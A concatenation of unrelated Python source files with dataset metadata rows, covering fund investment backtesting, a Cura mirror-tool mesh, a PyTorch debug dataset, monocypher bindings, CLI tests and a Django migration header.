Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数(直投)"].values[-1],
"总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
"累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
},
index=["DIP"],
)
if df:
return fund_net_value
else:
return Stat_df
def AIP_Weekly_Plans(
Freq,
code,
start_date,
end_date,
fund_category,
fixed_investment,
AIP=True,
df=False,
):
df = pd.DataFrame()
for freq in Freq:
df = df.append(
AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
freq=freq,
AIP=True,
df=False,
)
)
return df
def AIP_Weekly_plot(
code,
start_date,
end_date,
fund_category,
fixed_investment=1000,
Freq=["Monday", "Tuesday", "Wednesday", "Thursday", "Friday"],
figsize=(12, 8),
):
fig, ax = plt.subplots(figsize=figsize)
for freq in Freq:
AIP_df = AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
freq=freq,
AIP=True,
df=True,
)
ax.plot(AIP_df.净值日期, AIP_df.累计收益率, label=freq)
ax.legend()
ax.set_xlabel("净值日期", fontsize=14)
ax.set_ylabel("定投累计收益", fontsize=14)
AIP_direct_df = AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=1000,
freq="Monday",
AIP=False,
df=True,
)
ax2 = ax.twinx()
ax2.plot(AIP_direct_df.净值日期, AIP_direct_df["直投累计收益率"], "--", label="直投累计收益率")
ax2.legend(loc="upper right")
ax2.set_ylabel("直投累计收益率", fontsize=14)
plt.show()
def Max_AIP_Weekly(
code,
start_date,
end_date,
fund_category,
fixed_investment,
Threshold=(-3.0, 2.0),
AIP=True,
df=False,
Total_investment=100000,
):
fund_net_value = get_fund_net_worth(
code, start_date=start_date, end_date=end_date, fund_category=fund_category
)
fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
if AIP:
fund_net_value["定投金额(本金)"] = 0
fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
for i in range(len(fund_net_value["日增长率"])):
if fund_net_value["日增长率"].values[i] <= Threshold[0]:
fund_net_value["定投金额(本金)"][i] = fixed_investment
fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
elif (fund_net_value["日增长率"].values[i] >= Threshold[1]) & (
fund_net_value["累计定投金额(本金)"].values[i - 1] > fixed_investment
):
fund_net_value["定投金额(本金)"][i] = -fixed_investment
fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
fund_net_value["累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["平均成本"]
) * fund_net_value["累计份额"]
start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
fund_net_value["持有天数"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
).dt.days + 1
for i in range(len(fund_net_value["持有天数"])):
if fund_net_value["持有天数"][i] < 0:
fund_net_value["持有天数"][i] = 0
fund_net_value["年化收益率"] = (
(fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
/ fund_net_value["累计定投金额(本金)"]
) ** (365 / fund_net_value["持有天数"]) - 1
fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数"].values[-1],
"触发投资门槛(低买入)": Threshold[0],
"触发投资门槛(高卖出)": Threshold[1],
"单次金额": fixed_investment,
"买入次数": len(fund_net_value[fund_net_value["定投金额(本金)"] == 1000]),
"卖出次数": len(fund_net_value[fund_net_value["定投金额(本金)"] == -1000]),
"总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
"平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
"累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
},
index=["Plan"],
)
else:
fund_net_value["直投金额(本金)"] = 0
fund_net_value["直投金额(本金)"][0] = Total_investment
fund_net_value["直投累计购买份额(不变)"] = (
fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
)
fund_net_value["直投累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
) * fund_net_value["直投金额(本金)"][0]
fund_net_value["直投累计收益率"] = (
fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
)
fund_net_value["持有天数(直投)"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
).dt.days + 1
fund_net_value["直投累计年化收益率"] = (
(fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
/ fund_net_value["直投金额(本金)"][0]
) ** (365 / fund_net_value["持有天数(直投)"]) - 1
Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数(直投)"].values[-1],
"总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
"累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
},
index=["DIP"],
)
if df:
return fund_net_value
else:
return Stat_df
def Max_AIP_Weekly_Plans(
code,
start_date,
end_date,
fund_category,
fixed_investment,
upper_threshold,
lower_threshold,
):
df = pd.DataFrame()
threshold_list = list(itertools.product(lower_threshold, upper_threshold))
for i in range(len(threshold_list)):
df = df.append(
Max_AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
Threshold=threshold_list[i],
df=False,
)
)
return df
def Max_AIP_Weekly_plot(
code,
start_date,
end_date,
fund_category,
fixed_investment=1000,
max_plan={
"plan 1": (-1.0, 1.0),
"plan 2": (-2.0, 2.0),
"plan 3": (-3.0, 3.0),
"plan 4": (-3.0, 2.0),
"plan 5": (-3.0, 1.0),
},
figsize=(12, 8),
):
fig, ax = plt.subplots(figsize=figsize)
for plan in max_plan:
Max_AIP_df = Max_AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
Threshold=max_plan[plan],
AIP=True,
df=True,
)
ax.plot(Max_AIP_df.净值日期, Max_AIP_df.累计收益率, label=plan)
ax.legend()
ax.set_xlabel("净值日期", fontsize=14)
ax.set_ylabel("定投累计收益", fontsize=14)
Max_AIP_direct_df = Max_AIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=1000,
AIP=False,
df=True,
)
ax2 = ax.twinx()
ax2.plot(
Max_AIP_direct_df.净值日期, Max_AIP_direct_df["直投累计收益率"], "r--", label="直投累计收益率"
)
ax2.legend(loc="upper right")
ax2.set_ylabel("直投累计收益率", fontsize=14)
plt.show()
def StochasticAIP_Weekly(
code,
start_date,
end_date,
fund_category,
fixed_investment,
Freq,
seed,
df=False,
AIP=True,
Total_investment=100000,
):
fund_net_value = get_fund_net_worth(
code, start_date=start_date, end_date=end_date, fund_category=fund_category
)
fund_net_value["WeekDay"] = pd.to_datetime(fund_net_value["净值日期"]).dt.day_name()
if AIP:
fund_net_value["定投金额(本金)"] = 0
random.seed = seed
final_day = list(range(0, len(fund_net_value["WeekDay"]), Freq))[-1]
for i in list(range(0, final_day, Freq)):
invest_date = random.choice(fund_net_value["WeekDay"][i : i + Freq].values)
for j in range(i, i + Freq):
if fund_net_value["WeekDay"].values[j] == invest_date:
fund_net_value["定投金额(本金)"][j] = fixed_investment
fund_net_value["累计定投金额(本金)"] = fund_net_value["定投金额(本金)"].cumsum()
fund_net_value["购买份额"] = fund_net_value["定投金额(本金)"] / fund_net_value["单位净值"]
fund_net_value["累计份额"] = fund_net_value["购买份额"].cumsum()
fund_net_value["平均成本"] = fund_net_value["累计定投金额(本金)"] / fund_net_value["累计份额"]
fund_net_value["累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["平均成本"]
) * fund_net_value["累计份额"]
start_invest = fund_net_value["定投金额(本金)"].values.nonzero()[0][0]
fund_net_value["持有天数"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][start_invest]
).dt.days + 1
for i in range(len(fund_net_value["持有天数"])):
if fund_net_value["持有天数"][i] < 0:
fund_net_value["持有天数"][i] = 0
fund_net_value["年化收益率"] = (
(fund_net_value["累计收益"] + fund_net_value["累计定投金额(本金)"])
/ fund_net_value["累计定投金额(本金)"]
) ** (365 / fund_net_value["持有天数"]) - 1
fund_net_value["累计收益率"] = fund_net_value["累计收益"] / fund_net_value["累计定投金额(本金)"]
Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数"].values[-1],
"定投时间": "随机",
"定投金额": fixed_investment,
"分投期数": fund_net_value["累计定投金额(本金)"].values[-1] / fixed_investment,
"总购买份额": "%.3f" % fund_net_value["累计份额"].values[-1],
"平均成本": "%.3f" % fund_net_value["平均成本"].values[-1],
"累计收益": "%.3f" % fund_net_value["累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["年化收益率"].values[-1],
},
index=["Plan"],
)
else:
fund_net_value["直投金额(本金)"] = 0
fund_net_value["直投金额(本金)"][0] = Total_investment
fund_net_value["直投累计购买份额(不变)"] = (
fund_net_value["直投金额(本金)"][0] / fund_net_value["单位净值"][0]
)
fund_net_value["直投累计收益"] = (
fund_net_value["单位净值"] - fund_net_value["单位净值"][0]
) * fund_net_value["直投金额(本金)"][0]
fund_net_value["直投累计收益率"] = (
fund_net_value["直投累计收益"] / fund_net_value["直投累计购买份额(不变)"]
)
fund_net_value["持有天数(直投)"] = (
fund_net_value["净值日期"] - fund_net_value["净值日期"][0]
).dt.days + 1
fund_net_value["直投累计年化收益率"] = (
(fund_net_value["直投金额(本金)"][0] + fund_net_value["直投累计收益"])
/ fund_net_value["直投金额(本金)"][0]
) ** (365 / fund_net_value["持有天数(直投)"]) - 1
Stat_df = pd.DataFrame(
{
"基金代码": code,
"持有天数": fund_net_value["持有天数(直投)"].values[-1],
"总购买份额": "%.3f" % fund_net_value["直投累计购买份额(不变)"].values[0],
"累计收益": "%.3f" % fund_net_value["直投累计收益"].values[-1],
"累计收益率": "%.3f" % fund_net_value["直投累计收益率"].values[-1],
"年化收益率": "%.3f" % fund_net_value["直投累计年化收益率"].values[-1],
},
index=["DIP"],
)
if df:
return fund_net_value
else:
return Stat_df
def StochasticAIP_Weekly_Plans(
Freq, seed, code, start_date, end_date, fund_category, fixed_investment
):
df = pd.DataFrame()
for seed in seed:
df = df.append(
StochasticAIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
Freq=Freq,
seed=seed,
df=False,
AIP=True,
)
)
return df
def StochasticAIP_Weekly_plot(
code,
start_date,
end_date,
fund_category,
fixed_investment=1000,
Seed=[1, 2, 3, 4, 5],
figsize=(12, 8),
):
fig, ax = plt.subplots(figsize=figsize)
for s in Seed:
stochasticAIP_df = StochasticAIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=fixed_investment,
Freq=5,
seed=s,
AIP=True,
df=True,
)
ax.plot(stochasticAIP_df.净值日期, stochasticAIP_df.累计收益率, label="Seed " + str(s))
ax.legend()
ax.set_xlabel("净值日期", fontsize=14)
ax.set_ylabel("定投累计收益", fontsize=14)
stochasticAIP_direct_df = StochasticAIP_Weekly(
code,
start_date=start_date,
end_date=end_date,
fund_category=fund_category,
fixed_investment=1000,
Freq=5,
seed=123,
AIP=False,
df=True,
)
ax2 = ax.twinx()
ax2.plot(
stochasticAIP_direct_df.净值日期,
stochasticAIP_direct_df["直投累计收益率"],
"r--",
label="直投累计收益率",
)
ax2.legend(loc="upper right")
ax2.set_ylabel("直投累计收益率", fontsize=14)
plt.show()
| 31.625448
| 87
| 0.541962
| 2,176
| 17,647
| 4.077206
| 0.06296
| 0.174369
| 0.29486
| 0.042493
| 0.881988
| 0.863052
| 0.848061
| 0.839044
| 0.833183
| 0.806808
| 0
| 0.02198
| 0.303904
| 17,647
| 557
| 88
| 31.682226
| 0.700261
| 0
| 0
| 0.744283
| 0
| 0
| 0.109424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018711
| false
| 0
| 0.004158
| 0
| 0.04158
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
82f6af3736bed6742bf2f65c955fd18f2df64d3f
| 4,505
|
py
|
Python
|
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
Cura/Uranium/plugins/Tools/MirrorTool/MirrorToolHandle.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
|
100ecfd1208fe1890f8bada946145d716b2298eb
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from UM.Scene.ToolHandle import ToolHandle
from UM.View.Renderer import Renderer
from UM.Mesh.MeshData import MeshData
from UM.Mesh.MeshBuilder import MeshBuilder
from UM.Math.Vector import Vector
## Provides the two pyramid-shaped toolhandles for each axis for the mirror tool
class MirrorToolHandle(ToolHandle):
def __init__(self, parent = None):
self._name = "MirrorToolHandle"
super().__init__(parent)
self._handle_width = 8
self._handle_height = 14
self._handle_position = 20
def buildMesh(self):
mb = MeshBuilder()
#SOLIDMESH
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, self._handle_position, 0),
color = self._y_axis_color
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, -self._handle_position, 0),
color = self._y_axis_color,
axis = Vector.Unit_X,
angle = 180
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(self._handle_position, 0, 0),
color = self._x_axis_color,
axis = Vector.Unit_Z,
angle = 90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(-self._handle_position, 0, 0),
color = self._x_axis_color,
axis = Vector.Unit_Z,
angle = -90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, 0, -self._handle_position),
color = self._z_axis_color,
axis = Vector.Unit_X,
angle = 90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, 0, self._handle_position),
color = self._z_axis_color,
axis = Vector.Unit_X,
angle = -90
)
self.setSolidMesh(mb.build())
#SELECTIONMESH
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, self._handle_position, 0),
color = ToolHandle.YAxisSelectionColor
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, -self._handle_position, 0),
color = ToolHandle.YAxisSelectionColor,
axis = Vector.Unit_X,
angle = 180
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(self._handle_position, 0, 0),
color = ToolHandle.XAxisSelectionColor,
axis = Vector.Unit_Z,
angle = 90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(-self._handle_position, 0, 0),
color = ToolHandle.XAxisSelectionColor,
axis = Vector.Unit_Z,
angle = -90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, 0, -self._handle_position),
color = ToolHandle.ZAxisSelectionColor,
axis = Vector.Unit_X,
angle = 90
)
mb.addPyramid(
width = self._handle_width,
height = self._handle_height,
depth = self._handle_width,
center = Vector(0, 0, self._handle_position),
color = ToolHandle.ZAxisSelectionColor,
axis = Vector.Unit_X,
angle = -90
)
self.setSelectionMesh(mb.build())
| 31.284722
| 81
| 0.555605
| 461
| 4,505
| 5.127983
| 0.164859
| 0.215736
| 0.158629
| 0.106599
| 0.769882
| 0.769882
| 0.769882
| 0.766497
| 0.766497
| 0.766497
| 0
| 0.019458
| 0.361154
| 4,505
| 143
| 82
| 31.503497
| 0.801946
| 0.043285
| 0
| 0.733333
| 0
| 0
| 0.003718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016667
| false
| 0
| 0.041667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2259d921b4d5937d5d2f0d123c1cfbd95c8f5e6
| 1,599
|
py
|
Python
|
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
torchelie/datasets/debug.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | null | null | null |
import torch
import torchvision.transforms as TF
from torch.utils.data import Dataset
class ColoredColumns(Dataset):
"""
A dataset of precedurally generated images of columns randomly colorized.
Args:
*size (int): size of images
transform (transforms or None): the image transforms to apply to the
generated pictures
"""
def __init__(self, *size, transform=None) -> None:
super(ColoredColumns, self).__init__()
self.size = size
self.transform = transform if transform is not None else (lambda x: x)
def __len__(self):
return 10000
def __getitem__(self, i):
cols = torch.randint(0, 255, (3, 1, self.size[1]))
expanded = cols.expand(3, *self.size).float()
img = TF.ToPILImage()(expanded / 255)
return self.transform(img), 0
class ColoredRows(Dataset):
"""
A dataset of precedurally generated images of rows randomly colorized.
Args:
*size (int): size of images
transform (transforms or None): the image transforms to apply to the
generated pictures
"""
def __init__(self, *size, transform=None) -> None:
super(ColoredRows, self).__init__()
self.size = size
self.transform = transform if transform is not None else (lambda x: x)
def __len__(self):
return 10000
def __getitem__(self, i):
rows = torch.randint(0, 255, (3, self.size[0], 1))
expanded = rows.expand(3, *self.size).float()
img = TF.ToPILImage()(expanded / 255)
return self.transform(img), 0
| 30.75
| 78
| 0.631645
| 201
| 1,599
| 4.865672
| 0.293532
| 0.06544
| 0.04908
| 0.034765
| 0.799591
| 0.764826
| 0.764826
| 0.764826
| 0.670757
| 0.670757
| 0
| 0.028936
| 0.265166
| 1,599
| 51
| 79
| 31.352941
| 0.803404
| 0.263915
| 0
| 0.592593
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.074074
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d233df9bb2a4df76bf68b186b17cf9c43281b4cf
| 1,411
|
py
|
Python
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 4
|
2021-07-03T00:20:05.000Z
|
2022-01-18T23:07:34.000Z
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 3
|
2021-12-30T17:32:24.000Z
|
2022-01-19T23:04:51.000Z
|
src/monocypher/bindings/crypto_public.py
|
covert-encryption/monocypher-py
|
b1ddc33c58e72943584662b0f7f3c2810abed91c
|
[
"CC0-1.0"
] | 1
|
2022-01-16T09:48:13.000Z
|
2022-01-16T09:48:13.000Z
|
from monocypher.utils import ensure_length
from monocypher._monocypher import lib, ffi
def crypto_key_exchange(your_secret_key, their_public_key):
ensure_length('your_secret_key', your_secret_key, 32)
ensure_length('their_public_key', their_public_key, 32)
sk = ffi.from_buffer('uint8_t[32]', your_secret_key)
pk = ffi.from_buffer('uint8_t[32]', their_public_key)
shared = ffi.new('uint8_t[32]')
lib.crypto_key_exchange(shared, sk, pk)
return bytes(shared)
def crypto_key_exchange_public_key(your_secret_key):
ensure_length('your_secret_key', your_secret_key, 32)
sk = ffi.from_buffer('uint8_t[32]', your_secret_key)
pk = ffi.new('uint8_t[32]')
lib.crypto_key_exchange_public_key(pk, sk)
return bytes(pk)
def crypto_x25519(your_secret_key, their_public_key):
ensure_length('your_secret_key', your_secret_key, 32)
ensure_length('their_public_key', their_public_key, 32)
sk = ffi.from_buffer('uint8_t[32]', your_secret_key)
pk = ffi.from_buffer('uint8_t[32]', their_public_key)
shared = ffi.new('uint8_t[32]')
lib.crypto_x25519(shared, sk, pk)
return bytes(shared)
def crypto_x25519_public_key(your_secret_key):
ensure_length('your_secret_key', your_secret_key, 32)
sk = ffi.from_buffer('uint8_t[32]', your_secret_key)
pk = ffi.new('uint8_t[32]')
lib.crypto_x25519_public_key(pk, sk)
return bytes(pk)
| 30.021277
| 59
| 0.739192
| 226
| 1,411
| 4.207965
| 0.119469
| 0.168244
| 0.218717
| 0.100946
| 0.880126
| 0.868559
| 0.868559
| 0.81388
| 0.725552
| 0.702419
| 0
| 0.051325
| 0.14387
| 1,411
| 46
| 60
| 30.673913
| 0.735927
| 0
| 0
| 0.666667
| 0
| 0
| 0.143161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24a13b20bb8fd40a92d8065e9bd1082958c1c5c
| 166
|
py
|
Python
|
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
bender_mc/api/__init__.py
|
repole/bender-mc
|
1b3dd3b8d2c66df50a6efe2ac0799c1e1535c102
|
[
"MIT"
] | null | null | null |
from bender_mc.api.video import video_api_blueprint
from bender_mc.api.media_center import media_center_api_blueprint
from bender_mc.api.slots import slots_blueprint
| 41.5
| 65
| 0.891566
| 28
| 166
| 4.928571
| 0.357143
| 0.217391
| 0.26087
| 0.326087
| 0.391304
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072289
| 166
| 3
| 66
| 55.333333
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
9637be8e880eb4face797226c0e3d590f703e605
| 176
|
py
|
Python
|
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | 8
|
2018-03-05T05:13:39.000Z
|
2021-02-27T03:12:05.000Z
|
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | null | null | null |
microtbs_rl/algorithms/a2c/__init__.py
|
alex-petrenko/simple-reinforcement-learning
|
d0da1d9026d1f05e2552d08e56fbe58ad869fafd
|
[
"MIT"
] | 4
|
2018-09-04T04:44:26.000Z
|
2021-07-22T06:34:51.000Z
|
from microtbs_rl.algorithms.a2c.agent_a2c import AgentA2C
from microtbs_rl.algorithms.a2c.multi_env import MultiEnv
from microtbs_rl.algorithms.a2c import train_a2c, enjoy_a2c
| 44
| 59
| 0.875
| 28
| 176
| 5.25
| 0.464286
| 0.244898
| 0.285714
| 0.489796
| 0.55102
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042945
| 0.073864
| 176
| 3
| 60
| 58.666667
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
963f089a437ef73fb7d6ff82bc0874009365dad8
| 1,532
|
py
|
Python
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 25
|
2019-11-18T22:42:31.000Z
|
2019-11-25T16:21:56.000Z
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 6
|
2019-11-19T19:55:16.000Z
|
2019-11-25T18:51:42.000Z
|
tests/test_generate.py
|
mumblepins/cloudformation-cli
|
36cbf02f4a588445709b7b6fea32891d169e3246
|
[
"Apache-2.0"
] | 3
|
2019-11-18T22:39:25.000Z
|
2019-11-20T23:22:34.000Z
|
from unittest.mock import Mock, patch
from rpdk.core.cli import main
from rpdk.core.project import Project
def test_generate_command_generate(capsys):
mock_project = Mock(spec=Project)
mock_project.type_name = "foo"
with patch("rpdk.core.generate.Project", autospec=True, return_value=mock_project):
main(args_in=["generate"])
mock_project.load.assert_called_once_with()
mock_project.generate.assert_called_once_with(None, None, [])
mock_project.generate_docs.assert_called_once_with()
out, err = capsys.readouterr()
assert not err
assert "foo" in out
def test_generate_command_generate_with_args(capsys):
mock_project = Mock(spec=Project)
mock_project.type_name = "foo"
with patch("rpdk.core.generate.Project", autospec=True, return_value=mock_project):
main(
args_in=[
"generate",
"--endpoint-url",
"http://localhost/3001",
"--region",
"us-east-1",
"--target-schemas",
"/files/target-schema.json",
"/files/other-target-schema",
]
)
mock_project.load.assert_called_once_with()
mock_project.generate.assert_called_once_with(
"http://localhost/3001",
"us-east-1",
["/files/target-schema.json", "/files/other-target-schema"],
)
mock_project.generate_docs.assert_called_once_with()
out, err = capsys.readouterr()
assert not err
assert "foo" in out
| 29.461538
| 87
| 0.639687
| 185
| 1,532
| 5.048649
| 0.275676
| 0.141328
| 0.102784
| 0.12848
| 0.805139
| 0.740899
| 0.740899
| 0.740899
| 0.740899
| 0.740899
| 0
| 0.008621
| 0.24282
| 1,532
| 51
| 88
| 30.039216
| 0.796552
| 0
| 0
| 0.5
| 1
| 0
| 0.182768
| 0.100522
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.05
| false
| 0
| 0.075
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
964581f248d3f3dc36804a02b238885d30f79a83
| 13,531
|
py
|
Python
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | 2
|
2020-04-26T07:28:38.000Z
|
2022-03-31T14:24:44.000Z
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | 9
|
2017-12-01T04:43:31.000Z
|
2022-01-01T13:26:04.000Z
|
anodos/pflops/migrations/0001_initial.py
|
abezpalov/anodos.ru
|
6b905eb44b6f4a54f6e199b80cd714522deed277
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-12-21 13:30
import django.contrib.postgres.indexes
